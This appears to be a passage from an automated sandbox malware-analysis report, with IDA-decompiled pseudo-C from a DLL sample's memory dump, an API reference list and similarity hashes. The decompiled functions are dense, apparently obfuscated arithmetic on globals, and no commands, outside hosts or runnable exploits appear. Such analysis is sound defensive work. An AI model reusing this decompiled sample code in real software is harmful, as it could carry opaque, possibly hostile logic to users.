            										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
            										L64:
            										 *_t265 = _t202;
            										L65:
            										if(_a28 == 0) {
            											 *_t240 = _t256[0x14];
            										} else {
            											 *_t240 = _t256[0x14];
            										}
            										return _t202;
            									}
            									_t203 = _t199 - 1;
            									if(_t203 == 0) {
            										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
            										goto L64;
            									}
            									_t202 = _t203 - 1;
            									if(_t202 == 0) {
            										 *_t265 =  *_t265 & 0xfffff3ff;
            									}
            									goto L65;
            								}
            								_t210 = _t206 - 1;
            								if(_t210 == 0) {
            									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
            									goto L55;
            								}
            								if(_t210 == 1) {
            									 *_t265 =  *_t265 | 0x00000c00;
            								}
            							}
            							goto L58;
            						}
            						if(_t175 == 0x200) {
            							_t250 = _a4;
            							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
            							goto L35;
            						}
            						if(_t175 == 0x300) {
            							 *_a4 =  *_a4 & 0xffffffe3;
            						}
            						goto L36;
            					}
            					if(_t172 == 0x800) {
            						_t257 = _a4;
            						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
            						goto L26;
            					}
            					if(_t172 == 0xc00) {
            						 *_a4 =  *_a4 | 0x00000003;
            					}
            				}
            			}


            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D5116DD,?,?,00000008,?,?,6D50F598,00000000), ref: 6D51190F
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: ff6518660b2e045983b142c6f955f88f6d8a207a7adf982967d18bbf3b1719d2
            • Instruction ID: 12408121cb01604f07c0ae08abca6daa442aca77c5bed3280d7d98e17bcf7b40
            • Opcode Fuzzy Hash: ff6518660b2e045983b142c6f955f88f6d8a207a7adf982967d18bbf3b1719d2
            • Instruction Fuzzy Hash: 55B15E356146099FE709CF28C886F647BE0FF55364F25CA98E8A9CF6A1C735D982CB40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E6D503162() {
            				signed char _t261;
            				signed int _t268;
            				signed int _t269;
            				signed int _t271;
            				signed int _t278;
            				signed int _t279;
            				signed short _t280;
            				signed short _t281;
            				intOrPtr _t293;
            				signed short _t299;
            				signed short _t300;
            				signed int _t305;
            				signed int _t315;
            				signed int _t316;
            				intOrPtr _t322;
            				void* _t327;
            				signed int _t345;
            				signed int _t349;
            				signed int _t350;
            				signed int _t354;
            				intOrPtr _t363;
            				short _t376;
            				signed int _t377;
            				signed short _t380;
            				signed short _t381;
            				intOrPtr _t385;
            				intOrPtr _t387;
            				signed int _t388;
            				signed int _t389;
            				signed int _t393;
            				signed int _t395;
            				signed short _t396;
            				signed short _t397;
            				signed int _t403;
            				signed int _t405;
            				signed short _t408;
            				signed short _t418;
            				signed int _t420;
            				signed int _t422;
            				signed int _t435;
            				signed int _t436;
            				signed int _t487;
            				void* _t492;
            				signed int _t493;
            				signed int _t496;
            				intOrPtr _t498;
            				intOrPtr _t499;
            				signed int _t500;
            				signed int _t501;
            				signed int _t503;
            				signed int _t504;
            				signed int _t505;
            				signed int _t506;
            				void* _t507;
            				void* _t512;
            				void* _t514;
            				void* _t516;
            
            				_t261 =  *0x6d55d58a; // 0x0
            				 *0x6d55d58a = _t261 + 1;
            				_t385 =  *((intOrPtr*)(_t507 + 0x50));
            				_t505 =  *(_t507 + 0x4c);
            				 *(_t507 + 0x30) = _t261 & 0x000000ff;
            				 *(_t507 + 0x4c) = 0xf79 %  *(_t385 + 0x43b4);
            				asm("cdq");
            				_t393 =  *0x6d55d5a0; // 0x0
            				 *(_t507 + 0x20) = _t505 / ( *0x6d55d5c0 & 0x0000ffff);
            				 *(_t507 + 0x14) =  *0x6d55d5d0 & 0x0000ffff;
            				_t268 =  *0x6d55d5e0; // 0x0
            				_t498 =  *0x6d55d5cc; // 0x0
            				 *(_t507 + 0x10) = _t505;
            				_t506 = _t505 + 1;
            				_t499 = _t498 + 1;
            				 *(_t507 + 0x18) = _t393 ^ _t268;
            				_t395 =  *0x6d55d598; // 0x0
            				 *0x6d55d5cc = _t499;
            				_t500 = _t499 +  *0x6d55d5d8;
            				_t269 = _t268 - 1;
            				 *0x6d55d5e0 = _t269;
            				 *((intOrPtr*)(_t506 + _t395 * 4)) =  *((intOrPtr*)(0x3ac + _t395 * 4));
            				_t271 =  *0x6d55d588; // 0x0
            				 *((intOrPtr*)(_t507 + 0x24)) = 0x21a;
            				 *(_t507 + 0x1c) = 0xcb3;
            				 *(0x21a + _t500 * 4) =  *(0x21a - _t269 + _t500 * 4) ^  !_t271 & 0x00000100;
            				_t396 =  *0x6d55d5d0; // 0x0
            				_t397 = _t396 + 0xffff;
            				 *(_t507 + 0x40) = 0xffff;
            				 *0x6d55d5d0 = _t397;
            				_t278 =  *0x6d55d580; // 0x0
            				_t279 = _t278 ^ ( *0x6d55d5c4 & 0x0000ffff) %  *(_t507 + 0x1c) + (_t397 & 0x0000ffff);
            				 *0x6d55d580 = _t279;
            				 *(_t507 + 0x1c) = _t279;
            				_t280 =  *0x6d55d5c0; // 0x0
            				_t281 = _t280 + 1;
            				 *(_t507 + 0x28) = 0x1903;
            				 *0x6d55d5c0 = _t281;
            				_t492 = 0x4fc;
            				 *(_t507 + 0x2c) = _t506;
            				if( *((intOrPtr*)( *0x6d55d578 * 0xc +  *((intOrPtr*)(_t507 + 0x24)))) < (_t281 & 0x0000ffff) ||  *0x6d55d590 != 0x527) {
            					 *0x6d55d5dc =  *0x6d55d5dc | 0x0000001a;
            					_t500 = _t500 + 1;
            					 *( *(_t507 + 0x1c) +  *(_t507 + 0x10)) = 0x13ce / ( *( *(_t507 + 0x1c) +  *(_t507 + 0x10)) & 0x000000ff);
            				} else {
            					_t487 =  *(_t507 + 0x14);
            					 *(_t507 + 0x4c) =  *((intOrPtr*)(_t487 + 0x3f78)) + 8;
            					 *((char*)( *(_t507 + 0x10) +  *(_t507 + 0x1c) * 4)) =  *((intOrPtr*)(_t385 + _t506 * 4));
            					_t492 = 0xa88;
            					 *0x6d55d580 =  *0x6d55d580 + 1;
            					_t506 = _t506 + 1;
            					_t376 =  *0x6d55d5a0; // 0x0
            					 *((short*)(0x1cb9 + _t500 * 2)) = _t376;
            					_t377 =  *0x6d55d598; // 0x0
            					 *(_t487 + _t377 * 4) = 0x294f2b7 %  *(_t487 + _t377 * 4);
            					_t380 =  *0x6d55d588; // 0x0
            					_t381 = _t380 + 0xffff;
            					 *0x6d55d588 = _t381;
            					 *0x6d55d58c = (_t381 & 0x0000ffff) *  *0x6d55d5d4 %  *0x6d55d58c;
            				}
            				_t403 =  *0x6d55d5e0; // 0x0
            				_t493 = _t492 + 1;
            				 *(_t507 + 0x3c) = _t500;
            				 *(_t507 + 0x38) = _t500;
            				 *(_t507 + 0x34) = _t493;
            				 *0x6d55d5e0 = _t403 - 1;
            				if( *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x48)) + _t403 * 4)) ==  *((intOrPtr*)( *(_t507 + 0x14) + _t493 * 4))) {
            					 *0x6d55d5e4 =  *0x6d55d5e4 + 0xe9;
            					 *0x6d55d588 = 0x89a -  *0x6d55d5d4;
            				}
            				_t501 = _t500 + 1;
            				 *0x6d55d57c = 0x1942;
            				_t405 =  *0x6d55d5ac; // 0x0
            				 *(_t507 + 0x1c) = _t501 << 4;
            				_t293 =  *0x6d55d5d8; // 0x0
            				asm("cdq");
            				_t496 =  *(_t507 + 0x34);
            				_t387 =  *((intOrPtr*)(_t507 + 0x50));
            				 *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x24)) + _t405 * 4)) = (_t293 + 0xdb7) % 0xd6a /  *( *(_t507 + 0x1c) +  *(_t507 + 0x20) + 0x14) -  *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x24)) + _t405 * 4));
            				_t299 =  *0x6d55d5c0; // 0x0
            				_t300 = _t299 + 0xffff;
            				 *0x6d55d5c0 = _t300;
            				_t512 =  *((intOrPtr*)( *(_t507 + 0x2c) + (_t300 & 0x0000ffff) * 4)) -  *0x6d55d5b0; // 0x0
            				if(_t512 != 0 ||  *((intOrPtr*)( *(_t507 + 0x14) + _t506 * 4)) > ( *(_t496 * 3 +  *(_t507 + 0x10)) & 0x000000ff)) {
            					_t408 =  *0x6d55d59c; // 0x0
            					 *0x6d55d5a0 = _t408 & 0x0000ffff;
            					_t305 =  *0x6d55d5d4; // 0x0
            					 *0x6d55d59c = _t408 + 0x19d7;
            					 *(_t387 + _t506 * 4) = ( *((intOrPtr*)(_t387 + _t305 * 4)) -  *0x181e | 0x00000d3c) /  *(_t387 + _t506 * 4);
            					return 0xd3c;
            				} else {
            					_t514 =  *((intOrPtr*)( *(_t507 + 0x1c) + 0x436)) -  *0x6d55d5e0; // 0x0
            					if(_t514 < 0 ||  *((intOrPtr*)(_t506 + _t506 + 0x1338)) >= 0x105c) {
            						_t315 =  *0x6d55d5d4; // 0x0
            						_t503 =  *(_t507 + 0x3c);
            						 *((char*)(_t507 + 0x50)) = 0;
            						_t316 =  *0x6d55d598; // 0x0
            						 *(_t507 + 0x2c) = 0x26ddf97;
            						asm("cdq");
            						asm("cdq");
            						 *(_t503 + _t503 + 0x1cb9) =  *(_t503 + _t503 + 0x1cb9) &  *(0x3ac + _t316 * 4) % ( *(_t315 + _t315 + 0x1cb9) & 0x0000ffff) % ( *( *(_t507 + 0x1c) + _t506) & 0x000000ff);
            						_t322 =  *0x6d55d5c8; // 0x0
            						asm("cdq");
            						 *0x6d55d57c =  *0x6d55d57c +  *(_t322 + _t503 * 4) % 0x131d %  *( *((intOrPtr*)(_t507 + 0x24)) + 0x6b30);
            						_t496 = _t496 + 1;
            						_t327 = 0x76;
            						_t501 = _t503 - 1;
            						 *((intOrPtr*)( *(_t507 + 0x4c) + _t496 * 4)) = _t327 -  *((intOrPtr*)( *(_t507 + 0x4c) + _t496 * 4));
            						_t418 =  *0x6d55d59c; // 0x0
            						 *0x6d55d59c = _t418 +  *(_t507 + 0x40);
            						if( *((intOrPtr*)(0x436 + _t501 * 4)) != (_t418 & 0x0000ffff)) {
            							_t435 =  *0x6d55d5d4; // 0x0
            							_t436 = _t435 - 1;
            							 *0x6d55d5d4 = _t436;
            							 *((char*)(_t436 +  *(_t507 + 0x10))) = 0xb6 -  *((intOrPtr*)(_t436 +  *(_t507 + 0x10)));
            						}
            					} else {
            						_t516 = ( *(_t501 + _t501 + 0x1cb9) & 0x0000ffff) -  *0x6d55d580; // 0x0
            						if(_t516 <= 0) {
            							_t501 =  *(_t507 + 0x38);
            							 *( *(_t507 + 0x30) + (_t501 + _t501) * 8) =  *( *(_t507 + 0x30) + (_t501 + _t501) * 8) & 0x000013c9;
            							 *0x6d55d59c =  *0x6d55d59c +  *(_t387 + 0x375c) / ( *0x34f2 & 0x0000ffff);
            							_t363 =  *0x6d55d5b0; // 0x0
            							 *((short*)(0x1cb9 + _t496 * 2)) = (_t363 +  *0x6d55d5ac) / ( *(_t496 + _t496 + 0x1cb9) & 0x0000ffff);
            							 *0x6d55d578 = ( *((intOrPtr*)( *(_t507 + 0x14) + _t496 * 4)) - _t496 ^ 0x00000afe) *  *0x6d55d578;
            						}
            					}
            					_t420 =  *0x6d55d5c0 & 0x0000ffff;
            					if(_t420 <= 0x747) {
            						L18:
            						_t388 =  *(_t507 + 0x4c) & 0x000000ff;
            						if(_t388 !=  *0x3376) {
            							L21:
            							asm("cdq");
            							 *0x6d55d5e0 =  *( *((intOrPtr*)(_t507 + 0x24)) + _t496 * 4) % 0x1eb8 -  *0x6d55d5e0;
            							return 0xd3c;
            						}
            						_t504 = _t501 |  *(_t507 + 0x28);
            						_t422 =  *(_t507 + 0x30);
            						 *(_t507 + 0x40) = _t496 * 0xc;
            						 *(_t507 + 0x4c) = _t504 * _t388;
            						 *((intOrPtr*)(_t507 + 0x48)) =  *((intOrPtr*)(_t507 + 0x48)) - _t422;
            						 *(_t507 + 0x1c) = _t388 * 0xc +  *(_t507 + 0x2c);
            						 *((intOrPtr*)(_t507 + 0x50)) = _t422 + _t388 * 4;
            						do {
            							 *( *(_t507 + 0x40) +  *(_t507 + 0x20)) = (_t388 - ( *0x6d55d5d0 & 0x0000ffff)) *  *( *(_t507 + 0x40) +  *(_t507 + 0x20));
            							 *((short*)(0x1cb9 + _t506 * 2)) = ( *( *((intOrPtr*)(_t507 + 0x48)) +  *((intOrPtr*)(_t507 + 0x50))) & 0x0000ffff) * ( *(_t506 + _t506 + 0x1cb9) & 0x0000ffff);
            							 *0x6d55d5dc =  *0x6d55d5dc + ( *0x6d55d5c0 & 0x0000ffff |  *(_t507 + 0x4c));
            							 *(_t507 + 0x4c) =  *(_t507 + 0x4c) + _t504;
            							 *((char*)(_t388 +  *(_t507 + 0x18))) = 0x88;
            							_t345 =  *0x6d55d598; // 0x0
            							 *((intOrPtr*)(_t507 + 0x50)) =  *((intOrPtr*)(_t507 + 0x50)) + 4;
            							 *(_t507 + 0x1c) =  *(_t507 + 0x1c) + 0xc;
            							 *( *(_t507 + 0x1c)) = ((_t345 | _t388) +  *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x50))))) %  *( *(_t507 + 0x1c));
            							_t349 =  *0x6d55d57c; // 0x0
            							_t350 = _t349 | _t388;
            							asm("cdq");
            							_t388 = _t388 + 1;
            							 *( *(_t507 + 0x18) + _t496) = _t350 / ( *( *(_t507 + 0x18) + _t496) & 0x000000ff);
            						} while (_t388 ==  *0x3376);
            						goto L21;
            					} else {
            						_t389 =  *(_t387 + _t501 * 4);
            						do {
            							_t354 = 0x8e6 / _t389;
            							_t420 = _t420 + 1;
            							_t389 = _t354;
            						} while (_t420 > 0x747);
            						 *(_t507 + 0x1c) = _t389;
            						 *( *((intOrPtr*)(_t507 + 0x50)) + _t501 * 4) = _t354;
            						goto L18;
            					}
            				}
            			}


            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID: a~Qm
            • API String ID: 0-1813150672
            • Opcode ID: 15ccc18eb52ec282ba229cda087be0df31d87cee4501a5854b14b3e65050042f
            • Instruction ID: 7a6495a27dd2e4117595b3046806a39874f25ad00028d60232d2733172f64e57
            • Opcode Fuzzy Hash: 15ccc18eb52ec282ba229cda087be0df31d87cee4501a5854b14b3e65050042f
            • Instruction Fuzzy Hash: 94F18B766082418FDB19CF19C090A66BBF1FBCA308F11496EE886C7B51D7B4E945CF52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E6D517992(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int* _a24) {
            				signed int _v4;
            				signed int _v8;
            				signed int* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				signed short* _v32;
            				signed int _v36;
            				signed int _v40;
            				signed int _v44;
            				signed int _v48;
            				signed int _v52;
            				signed int _v56;
            				signed int _v57;
            				signed int _t467;
            				signed int _t469;
            				signed int _t470;
            				signed int _t472;
            				signed short _t474;
            				intOrPtr _t475;
            				signed int _t484;
            				signed int _t486;
            				signed int _t490;
            				signed int _t495;
            				signed int _t500;
            				signed int _t501;
            				signed int _t507;
            				intOrPtr _t508;
            				signed int _t509;
            				signed short _t514;
            				signed int _t520;
            				signed int _t523;
            				signed int _t525;
            				signed int _t529;
            				intOrPtr _t536;
            				signed short _t537;
            				signed int _t541;
            				signed int _t542;
            				signed short _t548;
            				signed short _t549;
            				signed int _t554;
            				signed int _t555;
            				intOrPtr _t562;
            				signed int _t564;
            				signed int _t565;
            				signed int _t566;
            				signed short _t575;
            				signed int _t580;
            				intOrPtr _t583;
            				signed int _t584;
            				signed int _t589;
            				intOrPtr _t592;
            				signed int _t604;
            				signed int _t605;
            				signed int _t606;
            				signed int _t607;
            				signed short _t612;
            				signed short _t613;
            				signed int _t614;
            				intOrPtr _t617;
            				intOrPtr _t619;
            				signed int _t622;
            				signed int _t624;
            				signed int _t627;
            				signed int _t629;
            				signed int _t631;
            				signed int _t635;
            				signed int _t640;
            				signed int _t642;
            				signed int _t643;
            				signed int _t654;
            				intOrPtr _t656;
            				signed int _t664;
            				intOrPtr _t666;
            				intOrPtr _t668;
            				signed int _t669;
            				signed int _t674;
            				signed int _t681;
            				signed int _t683;
            				signed int _t684;
            				signed int _t687;
            				signed int _t695;
            				intOrPtr _t696;
            				signed short _t697;
            				signed short _t698;
            				intOrPtr _t700;
            				signed int _t701;
            				signed int _t702;
            				signed int _t705;
            				signed int* _t715;
            				intOrPtr* _t717;
            				signed int _t718;
            				signed int _t720;
            				signed int _t721;
            				signed short _t724;
            				signed int* _t728;
            				intOrPtr _t730;
            				signed char _t732;
            				signed char _t733;
            				signed short _t735;
            				signed short _t736;
            				signed int _t737;
            				intOrPtr _t745;
            				signed short _t748;
            				intOrPtr _t753;
            				signed int _t754;
            				signed int _t757;
            				signed int _t758;
            				signed int _t759;
            				signed int _t760;
            				signed int _t761;
            				signed int _t763;
            				signed char _t765;
            				signed int _t767;
            				signed short _t769;
            				signed int _t773;
            				signed int _t774;
            				signed int _t776;
            				signed int _t777;
            				signed int _t778;
            				signed short _t780;
            				signed int _t784;
            				signed int _t785;
            				signed int _t786;
            				signed short _t788;
            				intOrPtr _t790;
            				signed short* _t791;
            				signed int _t792;
            				signed int* _t799;
            				intOrPtr _t801;
            				signed int _t802;
            				signed int _t803;
            				signed int _t806;
            				signed int _t807;
            				signed int _t809;
            				signed int _t813;
            				signed int _t819;
            				intOrPtr _t825;
            				signed int _t830;
            				signed int _t835;
            				intOrPtr _t844;
            				signed int _t851;
            				signed int _t852;
            				signed int _t853;
            				signed int _t859;
            				signed short _t862;
            				signed short _t869;
            				signed short _t870;
            				signed int _t887;
            				signed char _t888;
            				signed int _t906;
            				signed int _t907;
            				signed int _t913;
            				signed int _t925;
            				signed int _t926;
            				signed int _t930;
            				signed short _t931;
            				signed short _t932;
            				signed int _t940;
            				signed short* _t946;
            				signed int* _t950;
            				signed int _t952;
            				intOrPtr* _t953;
            				signed int _t958;
            				signed int _t965;
            				signed int _t967;
            				signed int _t972;
            				signed int _t977;
            				intOrPtr _t979;
            				signed int _t980;
            				signed int _t981;
            				signed int _t982;
            				signed int _t984;
            				signed int _t985;
            				signed int _t987;
            				signed int _t988;
            				signed int _t989;
            				intOrPtr _t990;
            				signed int _t992;
            				signed int _t997;
            				signed int* _t1001;
            				signed int* _t1002;
            				void* _t1012;
            				void* _t1013;
            				void* _t1014;
            				void* _t1017;
            
            				_t715 = _a24;
            				_t967 =  *0x6d55d58c; // 0x0
            				_v52 = _t967;
            				_v48 =  *((intOrPtr*)(_a20 +  *_t715 * 4));
            				_t467 =  *0x6d55d5e0; // 0x0
            				_t745 =  *0x6d55d5a8; // 0x0
            				_v20 = _t467 ^  *0x6d55d57c;
            				_t469 =  *0x6d55d5d4; // 0x0
            				_v40 = _t469;
            				_t470 =  *0x6d55d5ac; // 0x0
            				_push(0x1bdb);
            				_v36 =  *(_t745 + _t470 * 4) * 0x1492;
            				_t472 =  *0x6d55d578; // 0x0
            				asm("cdq");
            				_t474 = _t472 %  *0x6d55d57c & 0x0000ffff;
            				_t844 =  *0x6d55d594; // 0x0
            				_v56 = _t474;
            				_v4 = _t474 & 0x0000ffff;
            				_t475 =  *0x6d55d5c8; // 0x0
            				_v16 = _t474 & 0x0000ffff;
            				_t748 =  *0x6d55d59c; // 0x0
            				_v32 =  *((intOrPtr*)(_t475 + 0x251c));
            				_v24 =  *((intOrPtr*)((_t748 & 0x0000ffff) * 0xc + _t844));
            				 *0x6d55d59c = _t748 + 0xffff;
            				_v12 =  *((intOrPtr*)(_t844 + (_v40 + _v40) * 8));
            				_t484 =  *0x6d55d574; // 0x0
            				_v44 = _t484;
            				_t486 =  *0x6d55d598; // 0x0
            				_v57 =  *((intOrPtr*)(_a4 + 0x3148));
            				 *0x6d55d598 = _t486 - 1;
            				_t490 =  *0x6d55d5e0; // 0x0
            				_t753 =  *0x6d55d5bc; // 0x0
            				_t754 = _a12;
            				 *0x6d55d5e0 = _t490 - 1;
            				_a12 = _t754 + 1;
            				_push(_t754);
            				_t757 = _v48 & 0x000000ff;
            				_push(0x16f9 - _t757);
            				_push(0x5e);
            				_push(_t490);
            				_push( *((intOrPtr*)(_t753 + ( *0x6d55d588 & 0x0000ffff) * 4)));
            				_push(_t757);
            				_push(( *(_t967 + _t490 * 4) & 0x000000ff) * 0x1d9a);
            				_push(0x163b /  *( *0x6d55d580 * 0xc + _a8));
            				_push(0xb5d);
            				_push(0);
            				_push(_t715[_t486]);
            				_t495 = E6D515CA6();
            				_t758 =  *0x6d55d5e0; // 0x0
            				_t1013 = _t1012 + 0x30;
            				_t1001 = _a24;
            				_t717 = _v12;
            				_t969 = _v44;
            				_t1001[_t758] = _t495;
            				 *_t717 =  *_t717 + 1;
            				_t759 =  *0x6d55d57c; // 0x0
            				 *(_v44 + _t759 * 4) =  *(_v44 + _t759 * 4) ^  *0x6d55d5d0 & 0x0000ffff;
            				_t760 =  *_t1001;
            				_t850 = _v56 + 0xffff;
            				_v56 = _v56 + 0xffff;
            				_t1017 = ( *(_t760 + _a16 + 6) & 0x000000ff) -  *0x6d55d5b8; // 0x0
            				if(_t1017 != 0) {
            					_t500 =  *0x6d55d598; // 0x0
            					_t946 = _v32;
            					_v28 = _t500;
            					_t501 = _t500 * 6;
            					__eflags = ( *(_t946 + _t501) & 0x0000ffff) -  *((intOrPtr*)(_t717 + 0x9e4));
            					if(( *(_t946 + _t501) & 0x0000ffff) <=  *((intOrPtr*)(_t717 + 0x9e4))) {
            						L31:
            						_t851 = _v20;
            						 *_t946 =  *_t946 + 0xffff;
            						_t761 =  *_t946 & 0x0000ffff;
            						_t459 = _t851 + 0x14 + _t761 * 4;
            						 *_t459 =  *(_t851 + 0x14 + _t761 * 4) ^ (_v4 & 0x0000ffff | 0x00001387);
            						__eflags =  *_t459;
            					} else {
            						_t508 =  *0x6d55d594; // 0x0
            						__eflags =  *((intOrPtr*)(_t508 + _t760 * 4)) - 0x1bd2;
            						if( *((intOrPtr*)(_t508 + _t760 * 4)) <= 0x1bd2) {
            							goto L31;
            						} else {
            							_t509 =  *0x6d55d578; // 0x0
            							_t763 =  *_t717 +  *_t717;
            							_t852 = _v52;
            							__eflags =  *((intOrPtr*)(_t1001 + 8 + _t763 * 8)) - ( *(_t509 + _t852) & 0x000000ff);
            							if( *((intOrPtr*)(_t1001 + 8 + _t763 * 8)) > ( *(_t509 + _t852) & 0x000000ff)) {
            								L8:
            								_t853 = _v56 & 0x0000ffff;
            								_t765 =  *0x6d55d584; // 0x0
            								_t972 = ( *(_v20 + _t853 * 4) & 0x000000ff) * (_t765 & 0x000000ff);
            								_v48 = _t972;
            								 *0x6d55d584 = _t765 - 1;
            								_t767 =  *0x6d55d5d4; // 0x0
            								_v48 = _t972 -  *((intOrPtr*)(_v36 + 0x306));
            								_t514 =  *0x6d55d588; // 0x0
            								 *(_t853 * 0xc + _a4) = (_t514 -  *((intOrPtr*)(_t717 + 0x7820)) & 0x000014a7) / ( *(_t767 + _v52) & 0x000000ff) /  *(_t853 * 0xc + _a4);
            								 *0x6d55d588 =  *0x6d55d588 + 1;
            								_t976 =  *0x6d55d5e0; // 0x0
            								_t769 = _v16 & 0x0000ffff;
            								_t520 =  *0x6d55d598; // 0x0
            								_v56 = _t769;
            								_v28 = _t520;
            								goto L10;
            							} else {
            								_t997 =  *0x6d55d5e0; // 0x0
            								_t976 = _t997 - 1;
            								 *0x6d55d5e0 = _t997 - 1;
            								__eflags =  *((intOrPtr*)(_t717 + 8 + _t997 * 4)) - (_v40 & 0x000000ff);
            								if( *((intOrPtr*)(_t717 + 8 + _t997 * 4)) > (_v40 & 0x000000ff)) {
            									goto L8;
            								} else {
            									_t687 =  *_t1001 * 3;
            									_t825 = _a16;
            									__eflags =  *((char*)(_t687 + _t825)) - 0x41;
            									if( *((char*)(_t687 + _t825)) <= 0x41) {
            										_t769 = _v56;
            										L10:
            										_t718 =  *0x6d55d5d4; // 0x0
            										_t859 =  *((intOrPtr*)(_t1001 + 0xc + (_t718 + _t718) * 8));
            										_t523 = _v52;
            										_v16 = _t859;
            										__eflags = _t859 - ( *(_t523 + 0x16f1) & 0x000000ff);
            										if(_t859 == ( *(_t523 + 0x16f1) & 0x000000ff)) {
            											_t669 = _t769 & 0x0000ffff;
            											_t819 = _t669 * 6;
            											__eflags = _t819;
            											_v28 = _t669;
            											_v8 = _v40 & 0x000000ff;
            											_v4 = _t819;
            											while(1) {
            												_t925 =  *0x6d55d57c; // 0x0
            												_t674 =  *0x6d55d5d4; // 0x0
            												 *0x6d55d5d4 = _t674 - 1;
            												_t926 = _t925 - 1;
            												_push(_t926);
            												 *0x6d55d57c = _t926;
            												_t718 = E6D507EB5( *(( *0x6d55d5c0 & 0x0000ffff) * 0xc + _v44) &  *(_t946 + _t819) & 0x0000ffff, _v8,  *0x6d55d5c0 & 0x0000ffff, ( *0x6d55d5c0 & 0x0000ffff) *  *0x6d55d574, 0x4c, _v28 * _t976,  *((intOrPtr*)(_v44 + 0x628)) + _t925, _v16, _t674, 0x16da -  *0x6d55d5e0);
            												_t946 = _v32;
            												_t1013 = _t1013 + 0x2c;
            												_t681 =  *0x6d55d5b4; // 0x0
            												_v48 = _t681 / (_v48 & 0x000000ff);
            												_t930 = _v16 + 1;
            												_t683 = _v52;
            												 *0x6d55d5d4 = _t718;
            												_v16 = _t930;
            												__eflags = _t930 - ( *(_t683 + 0x16f1) & 0x000000ff);
            												if(_t930 != ( *(_t683 + 0x16f1) & 0x000000ff)) {
            													break;
            												}
            												_t976 =  *0x6d55d5e0; // 0x0
            												_t819 = _v4;
            											}
            											_t684 =  *0x6d55d598; // 0x0
            											_t1001 = _a24;
            											_v28 = _t684;
            										}
            										_t977 = _a8;
            										_t525 =  *0x6d55d5ac; // 0x0
            										__eflags =  *((intOrPtr*)(_t977 + _t525 * 4)) - 0x22;
            										if( *((intOrPtr*)(_t977 + _t525 * 4)) < 0x22) {
            											L20:
            											_t529 =  *0x6d55d5e0; // 0x0
            											_t862 = (0x00000e36 -  *0x6d55d5a4) % (_v56 & 0x0000ffff) & 0x0000ffff;
            											_a12 = _t862;
            											 *0x6d55d5e0 = _t529 + 1;
            											_t773 =  *0x6d55d5b0; // 0x0
            											_push( *0x6d55d5b4);
            											_t774 = _t773 - 1;
            											 *0x6d55d5b0 = _t774;
            											_v4 = _v28 + _t774;
            											_t776 =  *0x6d55d57c; // 0x0
            											_t536 =  *0x6d55d5bc; // 0x0
            											_push( *((intOrPtr*)(_t536 + _t776 * 4)));
            											_push( *(( *0x6d55d59c & 0x0000ffff) + _a16) & 0x000000ff ^  *0x6d55d580);
            											_push(_v4);
            											_push(0x1576);
            											_push((_t862 & 0x0000ffff) / ( *0x6d55d5c4 & 0x0000ffff));
            											_push( *(_v44 + _t529 * 4) & 0x000015c4);
            											_push(_t946[_t718] & 0x0000ffff);
            											_t537 = E6D519823();
            											_t777 =  *0x6d55d5e0; // 0x0
            											_t1014 = _t1013 + 0x20;
            											_t778 = _t777 + 1;
            											 *0x6d55d59c = _t537;
            											_t979 = _a16;
            											 *0x6d55d5e0 = _t778;
            											 *((char*)(_t778 + _v52)) =  *((intOrPtr*)(_v44 + 0x77a8)) -  *((intOrPtr*)(_t778 + _v52));
            											_t541 =  *0x6d55d580; // 0x0
            											_t542 = _t541 + 1;
            											 *0x6d55d580 = _t542;
            											_t780 =  *(_t542 * 3 + _t979) & 0x000000ff ^ ( *(_a4 + 0x690) |  *0x6d55d5a4);
            											__eflags = _t780;
            											 *(_v36 +  *_t1001 * 2) = _t780;
            											_t869 = _a12;
            										} else {
            											_t806 = _v56 & 0x0000ffff;
            											_t629 =  *0x6d55d5c0 & 0x0000ffff;
            											_v4 = _t806;
            											__eflags =  *((intOrPtr*)(_t977 + _t806 * 4)) - _t629;
            											if( *((intOrPtr*)(_t977 + _t806 * 4)) <= _t629) {
            												goto L20;
            											} else {
            												_t807 = _a4;
            												_t913 = _t629 + _t629;
            												_t631 = _t718 + _t718;
